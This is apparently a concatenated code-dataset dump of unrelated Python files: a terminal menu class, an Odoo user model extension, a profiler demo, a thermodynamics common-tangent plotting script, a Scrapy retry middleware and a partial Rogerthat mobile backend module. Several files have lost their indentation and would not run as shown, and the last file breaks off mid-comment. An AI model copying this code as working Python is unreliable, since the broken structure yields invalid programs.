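# Illustrative sketch (not part of the original module; `conn` is hypothetical):
# a ListMenu is filled with rows matching `fields`/`fieldLengths`, then run, e.g.
#   inv = ListMenu(db=conn, title="Inventory", description="", cursor=" > ")
#   inv.addListItem([42, "widget", "left shelf"])
#   inv.runMenu()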
class ObjectMenu(ListMenu):
def __init__(self, db):
ListMenu.__init__(self, db, title = "Object", description = "", cursor = " > ", closeOnPrint = True, fields = 1, fieldLengths = [1])
self.longDescrip = None
def makeTitle(self, title, description):
titleString = []
columns, rows = userInput.getTerminalSize()
titleString.append(self.borderString())
titleString.append('\n')
titleString.append(title.center(columns))
titleString.append('\n')
titleString.append('%s'%(self.underLine(inStr=title).center(columns)))
titleString.append('\n')
        if description not in (None, ""):
titleString.append((' %s'%(description)).center(columns))
titleString.append('\n')
titleString.append('-'*columns)
if self.longDescrip not in [None, ""]:
titleString.append(self.longDescrip.center(columns))
titleString.append('\n')
return titleString
if __name__ =="__main__":
menuEx = Menu(db = None, title = "Title", description = "Description", cursor = " >")
screen = menuEx.makeScreen()
userInput.printToScreen(screen)
|
snhobbs/DetectiveBuckPasser
|
buckPasser/menus.py
|
Python
|
unlicense
| 6,587
|
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import fields, models
class User(models.Model):
_inherit = ['res.users']
resume_line_ids = fields.One2many(related='employee_id.resume_line_ids', readonly=False)
employee_skill_ids = fields.One2many(related='employee_id.employee_skill_ids', readonly=False)
def __init__(self, pool, cr):
""" Override of __init__ to add access rights.
Access rights are disabled by default, but allowed
on some specific fields defined in self.SELF_{READ/WRITE}ABLE_FIELDS.
"""
hr_skills_fields = [
'resume_line_ids',
'employee_skill_ids',
]
init_res = super(User, self).__init__(pool, cr)
# duplicate list to avoid modifying the original reference
type(self).SELF_READABLE_FIELDS = type(self).SELF_READABLE_FIELDS + hr_skills_fields
type(self).SELF_WRITEABLE_FIELDS = type(self).SELF_WRITEABLE_FIELDS + hr_skills_fields
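        # (illustrative note, not in the original file: building the new lists with
        # `+` leaves the inherited SELF_READABLE_FIELDS / SELF_WRITEABLE_FIELDS
        # objects untouched; an in-place `+=` or .extend() would mutate the shared
        # base-class lists and leak these fields into unrelated models)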
return init_res
|
t3dev/odoo
|
addons/hr_skills/models/res_users.py
|
Python
|
gpl-3.0
| 1,067
|
from time import sleep
def bar():
sleep(0.1)
def foo():
bar()
bar()
foo()
|
vpelletier/pprofile
|
demo/twocalls2.py
|
Python
|
gpl-2.0
| 80
|
import scipy as sp
from scipy.optimize import fsolve
import pylab as plt
import matplotlib
import SW
import numpy as np
###############################################################################################
# Author: Ryan Scheirer #
# Email: scheirer@oregonstate.edu #
# Date: February 2016 #
#
# Uses fsolve to find the common tangent of the free energy density vs number density... #
# ...this then constructs the temp vs filling fraction liquid-vapor coexistence plot, total...#
# ...grand free energy per volume, and many more fun plots. #
###############################################################################################
################################## START INITIALIZATION #######################################
# #
# #
### Normal temperature linspace (useful for quick troubleshooting) ###
temp = plt.linspace(0.3,0.3,1)
### non-uniform temperature linspace (used to get higher resolution near critical temperature where fsolve starts to break down) ###
#temp = np.concatenate((plt.linspace(0.3,1.0,300),plt.linspace(1.0+0.7/300,1.3,600),plt.linspace(1.3+0.3/600,1.328,1000),plt.linspace(1.328+0.028/1000,1.33,30000)),axis=0)
### Initial guesses for fsolve ###
### (NOTE: need to "play" with these initially to get fsolve to work... ###
### ...This may require plotting your free energy per volume vs number density first to come up with some initial guesses. ###
#Lguess = 1e-9 # Initial left "n" guess (good for 0.6)
Lguess = 1e-12 # Initial left "n" guess (good for 0.3)
Rguess = 0.2 # Initial right "n" guess
# #
# #
############################### END INITIALIZATION ############################################
############################### START fsolve WORK #############################################
# #
# #
###
def g(x):
### just a general function which includes conditions for finding the cotangent
x1=x[0] # left guess "n"
x2=x[1] # right guess "n"
y1=SW.ftot(T,x[0]) # f(x1)
y2=SW.ftot(T,x[1]) # f(x2)
dy1=SW.numH_dftot_dn(T,x[0]) # df_dx(x1)
dy2=SW.numH_dftot_dn(T,x[1]) # df_dx(x2)
out=[(dy1-dy2)] # Condition 1: df_dx(x1) = df_dx(x2)
out.append(dy1-((y2-y1)/(x2-x1))) # Condition 2: df_dx(x1) = slope between the two positions
return out
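# Illustrative restatement (not in the original): the two residuals above encode the
# common-tangent construction. fsolve searches for densities n1, n2 where
#   df/dn(n1) == df/dn(n2)   and   df/dn(n1) == (f(n2) - f(n1)) / (n2 - n1),
# i.e. one straight line tangent to f(n) at both points; those densities are the
# coexisting vapor and liquid number densities at temperature T.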
data=[]
count=0
for T in temp:
count+=1
if count%10==0:
print '%f \r'%T,
sol = fsolve(g,[Lguess,Rguess]) # Magic happens here
data.append([T,sol[0],sol[1]]) # updating a list to keep track of the temperature T and corresponding left and right number densities found by fsolve
Lguess=sol[0] # Resets the next left guess number density for fsolve as the previous left solution
Rguess=sol[1] # Resets the next right guess number density for fsolve as the previous right solution
print(sol)
print(temp[-1])
# #
# #
########################### END fsolve WORK ###################################################
########################### START PLOTTING STUFF ##############################################
# #
# #
x = plt.linspace(1e-20,.2,4000) # x-axis grid space (used for when plotting number density on x-axis)
xmin=(3/(4.0*np.pi))*(1e-20)*(1/(SW.R)**3)
xmax=(3/(4.0*np.pi))*(0.2)*(1/(SW.R)**3)
xff = plt.linspace(xmin,xmax,4000)
nL = [data[i][1] for i in range(0,len(data))] # list of the left number density solutions obtained from fsolve
nR = [data[i][2] for i in range(0,len(data))] # list of the right number density solutions obtained from fsolve
Tlist = [data[i][0] for i in range(0,len(data))] # list of the corresponding temperatures for which the above number densities were found
ffL = [i*((4*np.pi*(SW.R)**3)/3) for i in nL] # converts left number density to filling fraction
ffR = [i*((4*np.pi*(SW.R)**3)/3) for i in nR] # converts right number density to filling fraction
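# Illustrative check (assumes a hard-sphere radius SW.R = 0.5, which is hypothetical):
# a number density n = 0.2 would map to a filling fraction ff = (4*pi*0.5**3/3)*0.2 ~ 0.105.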
def cotangent_t0():
### Total free energy per volume VS n (with cotangent line shown) for the first temperature ###
plt.figure()
plt.title('Total free energy per volume VS n @ T=%0.4f'%Tlist[-1])
plt.ylabel('Total free energy per volume')
plt.xlabel('Number density (n)')
plt.plot(x,SW.ftot(Tlist[-1],x),color='#f36118',linewidth=1)
plt.plot(x, SW.numH_dftot_dn(Tlist[-1],nR[-1])*(x-nR[-1])+SW.ftot(Tlist[-1],nR[-1]),color='#00c0c0',linewidth=1)
plt.plot(nL[-1],SW.ftot(Tlist[-1],nL[-1]),'ko')
    plt.plot(nR[-1],SW.ftot(Tlist[-1],nR[-1]),'ko')
#plt.legend(loc='best')
plt.savefig('cotangent.pdf')
plt.show()
#plt.close("all")
def cotangent_tloop():
### Total free energy per volume VS n (with cotangent line shown) for multiple temperatures, can use to make a gif later ###
count = 0
for i in range(0,len(Tlist)):
if (i%20==0):
plt.figure()
plt.title('Total free energy per volume VS n @ T=%0.4f'%Tlist[i])
plt.ylabel('Total free energy per volume')
plt.xlabel('Number density (n)')
plt.ylim(-0.8,1)
plt.xlim(0,.18)
plt.plot(x,SW.ftot(Tlist[i],x))
plt.plot(x, SW.numH_dftot_dn(Tlist[i],nR[i])*(x-nR[i])+SW.ftot(Tlist[i],nR[i]))
plt.plot(nL[i],SW.ftot(Tlist[i],nL[i]),'ko')
plt.plot(nR[i],SW.ftot(Tlist[i],nR[i]),'ro')
plt.savefig('cotangent_loop/cotangent%03d'%count)
count += 1
def liq_vap_co_tvsff():
### Vapor - Liquid coexistence curve for temperature VS filling fraction ###
plt.figure()
plt.title('Vapor - Liquid coexistence')
plt.ylabel('T')
plt.xlabel('ff')
plt.plot(ffL,Tlist,'m')
plt.plot(ffR,Tlist,'c')
plt.savefig('liqVapCo_Tvsff.pdf')
#plt.axhline(1.329,color='k')
#plt.axhline(1.33,color='r')
#plt.show()
def liq_vap_co_tvsn():
    ### Vapor - Liquid coexistence curve for temperature VS number density ###
plt.figure()
plt.title('Vapor - Liquid coexistence')
plt.ylabel('T')
    plt.xlabel('n')
plt.plot(nL,Tlist,'m')
plt.plot(nR,Tlist,'c')
plt.savefig('liqVapCo_Tvsn.pdf')
#plt.axhline(1.329,color='k')
#plt.axhline(1.33,color='r')
#plt.show()
def cotangent_fsolve_breakdown():
### Plots free energy per volume scaled by the tangent found from fsolve (used to determine approximately when fsolve stops working) ###
previousSize = nR[0]-nL[0]
count = 0
for i in range(0,len(nL)):
if (nR[i]-nL[i]) > 0.001: continue
#if (nR[i]-nL[i]) < 0.0000001: break
if True:
#if previousSize - (nR[i]-nL[i]) > 0.0000001:
x = plt.linspace(nL[i],nR[i],4000)
previousSize = nR[i]-nL[i]
datatangent=SW.numH_dftot_dn(Tlist[i],nR[i])*(x-nR[i])+SW.ftot(Tlist[i],nR[i])
#Tprev = Tlist[i]
plt.figure()
plt.title('ftot scaled VS n @ T=%0.6f'%Tlist[i])
plt.ylabel('Total free energy per volume')
plt.xlabel('n')
plt.plot(x,SW.ftot(Tlist[i],x)-datatangent,'b')
plt.plot(x,x-x,'g')
plt.plot(nL[i],0,'ko')
plt.plot(nR[i],0,'ro')
#plt.legend(loc='best')
plt.savefig('cotangent-graphs/relativeH/graph%04d'%count)
count += 1
#print(nR[i]-nL[i])
plt.close("all")
def liq_vap_co_pvsT():
### Vapor - Liquid coexistence curve for pressure vs temperature ###
pL=[]
pR=[]
pdiff=[]
for i in range(0,len(nL)):
pL.append(SW.findP(Tlist[i],nL[i]))
pR.append(SW.findP(Tlist[i],nR[i]))
pdiff.append(pL[i]-pR[i])
plt.figure()
plt.title('Vapor - Liquid coexistence')
plt.ylabel('Pressure')
plt.xlabel('Temperature')
plt.plot(Tlist,pL,color='#f36118',linewidth=5)
plt.plot(Tlist,pR,'c',linewidth=1)
plt.savefig('liqVapCo_pvsT.pdf')
plt.figure()
plt.title('Pressure check')
plt.ylabel('P')
plt.xlabel('T')
plt.plot(Tlist,pdiff,'r')
plt.savefig('liqVapCo_pvsT_diff.pdf')
#################################################
# CALL THE PLOTS YOU WANT TO PLOT #
# #
#cotangent_t0()
#cotangent_tloop()
#liq_vap_co_tvsff()
#liq_vap_co_tvsn()
#cotangent_fsolve_breakdown()
#liq_vap_co_pvsT()
# #
# #
#################################################
#np.savetxt('figs/snaft2.out',data)
# #
# #
######################################## END PLOTTING STUFF ###################################
|
droundy/deft
|
papers/thesis-scheirer/final/cotangent.py
|
Python
|
gpl-2.0
| 10,941
|
from scrapy.downloadermiddlewares.retry import RetryMiddleware
import logging
logger = logging.getLogger(__name__)
class RedisRetryMiddleware(RetryMiddleware):
def __init__(self, settings):
RetryMiddleware.__init__(self, settings)
def _retry(self, request, reason, spider):
retries = request.meta.get('retry_times', 0) + 1
if retries <= self.max_retry_times:
logger.debug("Retrying {request} " \
"(failed {retries} times): {reason}".format(
spider=spider, request=request,
retries=retries, reason=reason))
retryreq = request.copy()
retryreq.meta['retry_times'] = retries
retryreq.dont_filter = True
# our priority setup is different from super
retryreq.meta['priority'] = retryreq.meta['priority'] - 10
return retryreq
else:
logger.debug("Gave up retrying {request} "\
"(failed {retries} times): {reason}".format(
spider=spider, request=request,
retries=retries, reason=reason))
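# Illustrative sketch (assumption, not part of the original file): this middleware
# is typically enabled by swapping out the stock retry middleware in settings.py:
#   DOWNLOADER_MIDDLEWARES = {
#       'scrapy.downloadermiddlewares.retry.RetryMiddleware': None,
#       'crawling.redis_retry_middleware.RedisRetryMiddleware': 510,
#   }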
|
derekluo/scrapy-cluster
|
crawler/crawling/redis_retry_middleware.py
|
Python
|
mit
| 1,117
|
# -*- coding: utf-8 -*-
# Copyright 2020 Green Valley Belgium NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @@license_version:1.7@@
import base64
from datetime import datetime
import hashlib
import json
import logging
import os
from random import choice
import re
import time
from types import NoneType
from google.appengine.api import urlfetch
from google.appengine.api.images import Image
from google.appengine.ext import db, deferred, ndb
from mcfw.cache import cached
from mcfw.consts import MISSING
from mcfw.imaging import generate_qr_code
from mcfw.properties import azzert
from mcfw.rpc import returns, arguments
from rogerthat.bizz.communities.communities import get_community
from rogerthat.bizz.communities.models import CustomizationFeatures
from rogerthat.bizz.features import Features, Version
from rogerthat.bizz.job.update_friends import update_friend_service_identity_connections
from rogerthat.capi.system import unregisterMobile, forwardLogs
from rogerthat.consts import HIGH_LOAD_WORKER_QUEUE
from rogerthat.dal import put_and_invalidate_cache, generator
from rogerthat.dal.app import get_app_by_id
from rogerthat.dal.mobile import get_mobile_by_id, get_mobile_by_key, get_user_active_mobiles_count, \
get_mobiles_by_ios_push_id, get_mobile_settings_cached
from rogerthat.dal.profile import get_avatar_by_id, get_user_profile_key, get_user_profile, \
get_service_profile
from rogerthat.models import UserProfile, Avatar, CurrentlyForwardingLogs, Installation, InstallationLog, \
UserProfileInfo, UserProfileInfoAddress, UserProfileInfoPhoneNumber, UserAddressType
from rogerthat.models.properties.profiles import MobileDetailTO
from rogerthat.pages.legal import get_current_document_version, DOC_TERMS
from rogerthat.rpc import users
from rogerthat.rpc.models import Mobile, RpcCAPICall, ServiceAPICallback, Session, \
ClientError, ErrorPlatformVersion, ClientErrorOccurrence
from rogerthat.rpc.rpc import mapping, logError
from rogerthat.rpc.service import logServiceError
from rogerthat.settings import get_server_settings
from rogerthat.to.app import UpdateAppAssetResponseTO, UpdateEmbeddedAppsResponseTO, UpdateEmbeddedAppResponseTO
from rogerthat.to.profile import UserProfileTO
from rogerthat.to.service import ProfilePhoneNumberTO
from rogerthat.to.system import UserStatusTO, IdentityTO, UpdateSettingsResponseTO, UnregisterMobileResponseTO, \
UnregisterMobileRequestTO, IdentityUpdateResponseTO, LogErrorResponseTO, LogErrorRequestTO, ForwardLogsResponseTO, \
ForwardLogsRequestTO, AddProfileAddressRequestTO, ProfileAddressTO, UpdateProfileAddressRequestTO, \
AddProfilePhoneNumberRequestTO, UpdateProfilePhoneNumberRequestTO
from rogerthat.utils import now, try_or_defer, file_get_contents
from rogerthat.utils.app import get_app_id_from_app_user, get_human_user_from_app_user
from rogerthat.utils.crypto import encrypt_for_jabber_cloud, decrypt_from_jabber_cloud
from rogerthat.utils.languages import get_iso_lang
from rogerthat.utils.service import create_service_identity_user
from rogerthat.utils.transactions import run_in_xg_transaction, run_in_transaction
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO # @UnusedImport
_BASE_DIR = os.path.dirname(__file__)
_QR_SAMPLE_OVERLAY_PATH = os.path.join(_BASE_DIR, 'qr-sample.png')
QR_SAMPLE_OVERLAY = file_get_contents(_QR_SAMPLE_OVERLAY_PATH)
_QR_CODE_OVERLAY_PATH = os.path.join(_BASE_DIR, 'qr-brand.png')
DEFAULT_QR_CODE_OVERLAY = file_get_contents(_QR_CODE_OVERLAY_PATH)
_QR_OCA_CODE_OVERLAY_PATH = os.path.join(_BASE_DIR, 'qr-brand-oca.png')
DEFAULT_OCA_QR_CODE_OVERLAY = file_get_contents(_QR_OCA_CODE_OVERLAY_PATH)
_QR_CODE_HAND_ONLY_OVERLAY_PATH = os.path.join(_BASE_DIR, 'qr-hand-only.png')
HAND_ONLY_QR_CODE_OVERLAY = file_get_contents(_QR_CODE_HAND_ONLY_OVERLAY_PATH)
_QR_CODE_EMPTY_OVERLAY_PATH = os.path.join(_BASE_DIR, 'qr-empty.png')
EMPTY_QR_CODE_OVERLAY = file_get_contents(_QR_CODE_EMPTY_OVERLAY_PATH)
LOGO_SIZE = (72, 72)
LOGO_POSITION = (259, 220)
DEFAULT_QR_CODE_COLOR = [0x6a, 0xb8, 0x00]
ERROR_PATTERN_TXN_TOOK_TOO_LONG = re.compile('Transaction with name "(.*)" took (\d+) milliseconds!')
COM_MOBICAGE_RE = re.compile('\\b(com\.mobicage\.rogerth\\S+)')
BRACKETS_RE = re.compile('({.*?})')
@returns(NoneType)
@arguments(user=users.User, mobile=Mobile, reason=unicode)
def unregister_mobile(user, mobile, reason=None):
azzert(mobile.user == user)
mark_mobile_for_delete(user, mobile.key())
def trans():
request = UnregisterMobileRequestTO()
request.reason = reason
ctxs = unregisterMobile(unregister_mobile_success_callback, logError, user, request=request,
MOBILE_ACCOUNT=mobile,
DO_NOT_SAVE_RPCCALL_OBJECTS=True) # Only unregister this mobile :)
for ctx in ctxs:
ctx.mobile_key = mobile.key()
ctx.put()
run_in_transaction(trans, xg=True)
@mapping('com.mobicage.capi.system.unregisterMobileSuccessCallBack')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=UnregisterMobileResponseTO)
def unregister_mobile_success_callback(context, result):
mobile_key = context.mobile_key
mobile = get_mobile_by_key(mobile_key)
current_user = users.get_current_user()
azzert(mobile.user == current_user)
azzert(mobile == users.get_current_mobile())
mobile.status = mobile.status | Mobile.STATUS_UNREGISTERED
mobile.put()
@returns(NoneType)
@arguments(account=unicode, mobile_key=db.Key)
def delete_xmpp_account(account, mobile_key):
settings = get_server_settings()
jabberEndpoint = choice(settings.jabberAccountEndPoints)
account_parts = account.split("@")
azzert(len(account_parts) == 2)
user = account_parts[0]
server = account_parts[1]
payload = json.dumps(dict(username=user, server=server))
challenge, data = encrypt_for_jabber_cloud(settings.jabberSecret.encode('utf8'), payload)
jabberUrl = "http://%s/unregister" % jabberEndpoint
logging.info("Calling url %s to unregister %s" % (jabberUrl, account))
response = urlfetch.fetch(url=jabberUrl, payload=data, method="POST", allow_truncated=False, follow_redirects=False,
validate_certificate=False, deadline=30)
azzert(response.status_code == 200)
success, signalNum, out, err = json.loads(
decrypt_from_jabber_cloud(settings.jabberSecret.encode('utf8'), challenge, response.content))
logging.info("success: %s\nexit_code or signal: %s\noutput: %s\nerror: %s" % (success, signalNum, out, err))
azzert(success)
if mobile_key:
        try_or_defer(_mark_mobile_as_unregistered, mobile_key)
def _mark_mobile_as_unregistered(mobile_key):
def trans():
mobile = db.get(mobile_key)
mobile.status = mobile.status | Mobile.STATUS_ACCOUNT_DELETED
mobile.put()
return mobile
db.run_in_transaction(trans)
def account_removal_response(sender, stanza):
logging.info("Incoming 'unregister' message from sender %s:\n%s" % (sender, stanza))
unregister_elements = stanza.getElementsByTagNameNS(u"mobicage:jabber", u"unregister")
unregister_element = unregister_elements[0]
mobile_id = unregister_element.getAttribute(u'mobileid')
mobile = get_mobile_by_id(mobile_id)
mobile.status = mobile.status | Mobile.STATUS_ACCOUNT_DELETED
mobile.put()
@returns(NoneType)
@arguments(current_user=users.User, current_mobile=Mobile, majorVersion=int, minorVersion=int, flushBackLog=bool,
appType=int, product=unicode, timestamp=long, timezone=unicode, timezoneDeltaGMT=int, osVersion=unicode,
deviceModelName=unicode, simCountry=unicode, simCountryCode=unicode, simCarrierName=unicode,
simCarrierCode=unicode, netCountry=unicode, netCountryCode=unicode, netCarrierName=unicode,
netCarrierCode=unicode, localeLanguage=unicode, localeCountry=unicode, now_time=int, deviceId=unicode)
def _heart_beat(current_user, current_mobile, majorVersion, minorVersion, flushBackLog, appType, product, timestamp,
timezone, timezoneDeltaGMT, osVersion, deviceModelName, simCountry, simCountryCode, simCarrierName,
simCarrierCode, netCountry, netCountryCode, netCarrierName, netCarrierCode, localeLanguage,
localeCountry, now_time, deviceId):
m = current_mobile
mobile_key = m.key()
ms_key = get_mobile_settings_cached(m).key()
def trans():
# type: () -> tuple[Mobile, UserProfile, bool]
keys = (mobile_key, ms_key, get_user_profile_key(current_user))
mobile, ms, my_profile = db.get(keys) # type: (Mobile, MobileSettings, UserProfile)
if mobile.account not in my_profile.get_mobiles():
logging.warn('Mobile account "%s" of user %s has been unregistered', mobile.account, current_user)
return mobile, my_profile, False
if appType != MISSING:
mobile.type = my_profile.get_mobiles()[mobile.account].type_ = appType
if simCountry != MISSING:
mobile.simCountry = simCountry
if simCountryCode != MISSING:
mobile.simCountryCode = simCountryCode
if simCarrierCode != MISSING:
mobile.simCarrierCode = simCarrierCode
if simCarrierName != MISSING:
mobile.simCarrierName = simCarrierName
if netCountry != MISSING:
mobile.netCountry = netCountry
if netCountryCode != MISSING:
mobile.netCountryCode = netCountryCode
if netCarrierCode != MISSING:
mobile.netCarrierCode = netCarrierCode
if netCarrierName != MISSING:
mobile.netCarrierName = netCarrierName
if deviceModelName != MISSING:
mobile.hardwareModel = deviceModelName
if osVersion != MISSING:
mobile.osVersion = osVersion
if localeCountry != MISSING:
mobile.localeCountry = localeCountry
if localeLanguage != MISSING:
mobile.localeLanguage = localeLanguage
if timezone != MISSING:
mobile.timezone = timezone
if timezoneDeltaGMT != MISSING:
mobile.timezoneDeltaGMT = timezoneDeltaGMT
if deviceId != MISSING:
mobile.deviceId = deviceId
language = mobile.localeLanguage
if language:
if '-' in language:
language = get_iso_lang(language.lower())
elif mobile.localeCountry:
language = '%s_%s' % (mobile.localeLanguage, mobile.localeCountry)
if my_profile.language != language:
my_profile.language = language
# trigger friend.update service api call
deferred.defer(update_friend_service_identity_connections, my_profile.key(), [u"language"],
_transactional=True)
ms.majorVersion = majorVersion
ms.minorVersion = minorVersion
ms.lastHeartBeat = now_time
my_profile.country = mobile.netCountry or mobile.simCountry or mobile.localeCountry
my_profile.timezone = mobile.timezone
my_profile.timezoneDeltaGMT = mobile.timezoneDeltaGMT
must_update_app_settings = False
if my_profile.tos_version != get_current_document_version(DOC_TERMS):
if mobile.is_android:
version = Features.ASK_TOS.android
elif mobile.is_ios:
version = Features.ASK_TOS.ios
else:
version = Version(0, 1)
must_update_app_settings = Version(majorVersion, minorVersion) >= version
put_and_invalidate_cache(ms, mobile, my_profile)
return mobile, my_profile, must_update_app_settings
mobile, profile, must_update_app_settings = run_in_xg_transaction(trans)
if must_update_app_settings:
from rogerthat.bizz.app import push_app_settings_to_user
# This will ask to agree to Terms and Conditions when version has changed
push_app_settings_to_user(profile, mobile.app_id)
@returns(int)
@arguments(current_user=users.User, current_mobile=Mobile, majorVersion=int, minorVersion=int, flushBackLog=bool,
appType=int, product=unicode, timestamp=long, timezone=unicode, timezoneDeltaGMT=int, osVersion=unicode,
deviceModelName=unicode, simCountry=unicode, simCountryCode=unicode, simCarrierName=unicode,
simCarrierCode=unicode, netCountry=unicode, netCountryCode=unicode, netCarrierName=unicode,
netCarrierCode=unicode, localeLanguage=unicode, localeCountry=unicode, deviceId=unicode)
def heart_beat(current_user, current_mobile, majorVersion, minorVersion, flushBackLog, appType, product, timestamp,
timezone, timezoneDeltaGMT, osVersion, deviceModelName, simCountry, simCountryCode, simCarrierName,
simCarrierCode, netCountry, netCountryCode, netCarrierName, netCarrierCode, localeLanguage,
localeCountry, deviceId):
now_time = int(time.time())
try_or_defer(_heart_beat, current_user, current_mobile, majorVersion, minorVersion, flushBackLog, appType, product,
timestamp, timezone, timezoneDeltaGMT, osVersion, deviceModelName, simCountry, simCountryCode,
simCarrierName, simCarrierCode, netCountry, netCountryCode, netCarrierName, netCarrierCode,
localeLanguage, localeCountry, now_time, deviceId,
accept_missing=True)
return now_time
@returns(UserStatusTO)
@arguments(user=users.User)
def get_user_status(user):
logging.info("Getting user status for %s" % user)
us = UserStatusTO()
user_profile = get_user_profile(user)
us.profile = UserProfileTO.fromUserProfile(user_profile) if user_profile else None
us.registered_mobile_count = get_user_active_mobiles_count(user)
if user_profile:
avatar = get_avatar_by_id(user_profile.avatarId)
us.has_avatar = bool(avatar and avatar.picture)
else:
us.has_avatar = False
return us
@returns(IdentityTO)
@arguments(app_user=users.User, user_profile=UserProfile)
def get_identity(app_user, user_profile=None):
idTO = IdentityTO()
profile = user_profile or get_user_profile(app_user)
human_user = get_human_user_from_app_user(app_user)
idTO.email = human_user.email()
if profile.first_name:
idTO.name = u'%s %s' % (profile.first_name, profile.last_name)
idTO.firstName = profile.first_name
idTO.lastName = profile.last_name
else:
idTO.name = profile.name
parts = profile.name.split(" ", 1)
if len(parts) == 1:
idTO.firstName = parts[0]
idTO.lastName = u''
else:
idTO.firstName = parts[0]
idTO.lastName = parts[1]
idTO.avatarId = profile.avatarId
idTO.qualifiedIdentifier = profile.qualifiedIdentifier
idTO.birthdate = profile.birthdate or 0
idTO.gender = profile.gender or 0
idTO.hasBirthdate = profile.birthdate is not None
idTO.hasGender = profile.gender is not None
idTO.profileData = profile.profileData
idTO.communityId = profile.community_id
idTO.homeScreenId = profile.home_screen_id
return idTO
@mapping('com.mobicage.capi.system.updateSettingsResponseHandler')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=UpdateSettingsResponseTO)
def update_settings_response_handler(context, result):
pass
@mapping('com.mobicage.capi.system.identityUpdateResponseHandler')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=IdentityUpdateResponseTO)
def identity_update_response_handler(context, result):
pass
@mapping('com.mobicage.capi.system.forwardLogsResponseHandler')
@returns(NoneType)
@arguments(context=RpcCAPICall, result=ForwardLogsResponseTO)
def forward_logs_response_handler(context, result):
pass
def _mark_mobile_for_delete(mobile):
logging.info("Marking mobile (%s) for delete", mobile.key())
mobile.pushId = None
mobile.status = mobile.status | Mobile.STATUS_DELETE_REQUESTED
db.put_async(mobile)
@returns(NoneType)
@arguments(user=users.User, mobile_key=db.Key)
def mark_mobile_for_delete(user, mobile_key):
def trans():
mobile, profile = db.get((mobile_key, get_user_profile_key(user)))
_mark_mobile_for_delete(mobile)
if profile:
mobiles = profile.get_mobiles()
mobiles.pop(mobile.account, None)
profile.save_mobiles(mobiles)
profile.put()
else:
logging.warn("No profile found for user %s", user)
xg_on = db.create_transaction_options(xg=True)
db.run_in_transaction_options(xg_on, trans)
@returns(NoneType)
@arguments(mobile=Mobile, token=unicode)
def update_apple_push_device_token(mobile, token):
    if mobile.type in Mobile.IOS_TYPES:
        token.decode("hex")  # just check whether it is nicely hex encoded
    if mobile.pushId == token:
        return  # prevent unnecessary datastore accesses
old_mobiles = list(get_mobiles_by_ios_push_id(token))
user = mobile.user
def trans(mobile_key, user):
mobile, profile = db.get((mobile_key, get_user_profile_key(user)))
mobile.pushId = token
db.put_async(mobile)
mobiles = profile.get_mobiles()
if mobile.account in mobiles:
mobiles[mobile.account].pushId = token
else:
md = MobileDetailTO()
md.account = mobile.account
md.type_ = mobile.type
md.pushId = mobile.pushId
md.app_id = mobile.app_id
mobiles[md.account] = md
for old_mobile in old_mobiles:
if mobile_key != old_mobile.key():
if mobile.user == old_mobile.user:
_mark_mobile_for_delete(old_mobile)
mobiles.pop(old_mobile.account, None)
else:
deferred.defer(mark_mobile_for_delete, old_mobile.user, old_mobile.key(), _transactional=True)
profile.save_mobiles(mobiles)
profile.put()
xg_on = db.create_transaction_options(xg=True)
db.run_in_transaction_options(xg_on, trans, mobile.key(), user)
@returns(NoneType)
@arguments(token=unicode)
def obsolete_apple_push_device_token(token):
logging.info("Obsoleting apple push device " + token)
for mobile in get_mobiles_by_ios_push_id(token):
logging.info("Removing pushId from mobile %s of %s.", mobile.account, mobile.user)
mobile.pushId = None
mobile.put()
@cached(2, 0, datastore="qrcode_image")
@returns(str)
@arguments(content=unicode, overlay=str, color=[int], sample=bool)
def qrcode(content, overlay, color, sample):
return generate_qr_code(content, overlay, color, QR_SAMPLE_OVERLAY if sample else None)
@returns(NoneType)
@arguments(mobile=Mobile, phone_number=unicode)
def set_validated_phonenumber(mobile, phone_number):
if mobile.type == Mobile.TYPE_ANDROID_HTTP or mobile.type == Mobile.TYPE_ANDROID_FIREBASE_HTTP:
mobile.phoneNumber = phone_number
mobile.phoneNumberVerified = True
mobile.put()
elif mobile.type in Mobile.IOS_TYPES:
if mobile.phoneNumberVerificationCode == phone_number:
mobile.phoneNumberVerified = True
mobile.put()
else:
raise ValueError("Verification code does not match")
else:
raise ValueError("Unknown platform")
@returns(bool)
@arguments(request=LogErrorRequestTO)
def shouldLogClientError(request):
# Return boolean - should we put this error in mobile error logs
if request.description:
if 'Warning: DNS SRV did time out. Falling back to rogerth.at:5222' in request.description \
or 'Using fallback value for DNS SRV (but network is up)' in request.description:
return False
matches = ERROR_PATTERN_TXN_TOOK_TOO_LONG.findall(request.description)
if matches:
return False
if request.errorMessage:
if "ServerRespondedWrongHTTPCodeException" in request.errorMessage:
return False
if "java.lang.NullPointerException" in request.errorMessage \
and "android.os.Parcel.readException(Parcel.java" in request.errorMessage:
return False
if "java.lang.SecurityException: !@Too many alarms (500) registered from pid " in request.errorMessage:
return False
if "mCursorDrawable" in request.errorMessage and "huawei" in request.platformVersion.lower():
return False
return True
@returns(LogErrorResponseTO)
@arguments(request=LogErrorRequestTO, user=users.User, install_id=unicode, session=Session)
def logErrorBizz(request, user=None, install_id=None, session=None):
from add_1_monkey_patches import DEBUG
if not shouldLogClientError(request):
logging.warn('Ignoring logError request for %s:\n%s\n\n%s',
user or install_id, request.description, request.errorMessage)
return
if DEBUG:
logging.warn('CLIENT ERROR:\n%s\n\n%s', request.description, request.errorMessage)
deferred.defer(_log_client_error, request, user, install_id, session, _queue=HIGH_LOAD_WORKER_QUEUE)
def _filter_specific_stuff(msg):
msg = COM_MOBICAGE_RE.sub('', msg)
msg = BRACKETS_RE.sub('', msg)
return msg
def get_error_key(platform, message, description):
hashed_err = hashlib.sha256()
hashed_err.update(str(platform))
hashed_err.update('-')
hashed_err.update(_filter_specific_stuff(message).encode('utf-8') if message else '')
hashed_err.update('-')
hashed_err.update(_filter_specific_stuff(description).encode('utf-8') if description else '')
key_name = hashed_err.hexdigest()
return key_name
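# Illustrative note (not in the original file): because _filter_specific_stuff
# strips com.mobicage.rogerth... class paths and {...} fragments before hashing,
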